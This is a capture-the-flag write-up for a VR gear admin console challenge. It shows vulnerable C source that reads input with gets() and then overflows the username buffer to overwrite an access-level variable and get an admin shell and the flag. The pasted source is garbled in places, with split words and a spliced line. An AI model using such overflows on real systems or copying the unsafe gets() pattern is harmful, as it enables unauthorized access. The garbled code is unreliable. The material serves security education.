Here's the VR gear admin console. See if you can figure out a way to log in. The problem is found here: /problems/51645e84d55d376442beaf264e0908b9
What happens if you read in more characters than the length of the username buffer? You should look at an ascii table to see what character you need to choose. Numbers are stored in little-endian format, which means that the lowest byte of the number is first. "cat file - | vrgearconsole " will keep the pipe open for commands.
So here comes the last challenge of Binary exploitation of Level 2. Let's go to dir: /problems/51645e84d55d376442beaf264e0908b9
So, we got 3 files in the directory.
$ls
flag.txt vrgearconsole vrgearconsole.c
-
Lets check what is written in
vrgearconsole.c
file.cat vrgearconsole.c #include <stdlib.h> #include <stdio.h> int login() { int accessLevel = 0xff; char username[16]; char password[32]; printf("Username (max 15 characters): "); gets(username); printf("Password (max 31 characters): "); gets(password); if (!strcmp(username, "admin") && !strcmp(password, "{{ create_long_password() }}")) { accessLevel = 2; } else if (!strcmp(username, "root") && !strcmp(pass word, "{{ create_long_password() }}")) { accessLevel = 0; } else if (!strcmp(username, "artist") && !strcmp(pa ssword, "my-password-is-secret")) { accessLevel = 0x80; } return accessLevel; } int main(int argc, char **argv) { setbuf(stdout, NULL); printf( "+----------------------------------------+\n" "| |\n" "| |\n" "| |\n" "| |\n" "| Welcome to the VR gear admin console |\n" "| |\n" "| |\n" "| |\n" "| |\n" "+----------------------------------------+\n" "| |\n" "| Your account is not recognized |\n" "| |\n" "+----------------------------------------+\n" "\n\n\n\n" "Please login to continue...\n\n\n" ); int access = login(); printf("Your access level is: 0x%08x\n", access); if (access >= 0xff || access <= 0) { printf("Login unsuccessful.\n"); exit(10); } else if (access < 0x30) { printf("Admin access granted!\n"); system("/bin/sh");s in \"flag.txt\".\n"); } else { printf("Login successful.\n"); printf("You do not have permission to access thi exit(1); } }
Now as you can see
int accessLevel = 0xff; char username[16]; char password[32];
0xff is 255. So we can enter 16 character in the username field. But What if we give 1 more character, then maybe with the grace of god we will get something good.
-
Lets try it out,
$spirit="spiritedwolflove" $echo -n $spirit | wc -c 16
Now if we enter
!
after love then it will look like thisspiritedwolflove!
-
Lets echo it out in one file name
spirit
. In current folder we don't have permission to write so we will write in~
home directory.echo "spiritedwolflove!" > ~/spirit
-
Now use
cat
+pipe
+netcat
:$cat ~/spirit - | ./vrgearconsole +----------------------------------------+ | | | | | | | | | Welcome to the VR gear admin console | | | | | | | | | +----------------------------------------+ | | | Your account is not recognized | | | +----------------------------------------+ Please login to continue... Username (max 15 characters): Password (max 31 character s): --> Here press enter Your access level is: 0x00000021 Admin access granted! The flag is in "flag.txt". ~ls flag.txt vrgearconsole vrgearconsole.c ~cat flag.txt 8b7ea70220f19ab662750a8710a552c4
So, i think we got the flag 8b7ea70220f19ab662750a8710a552c4
.
Hope you liked it :)
~Thanks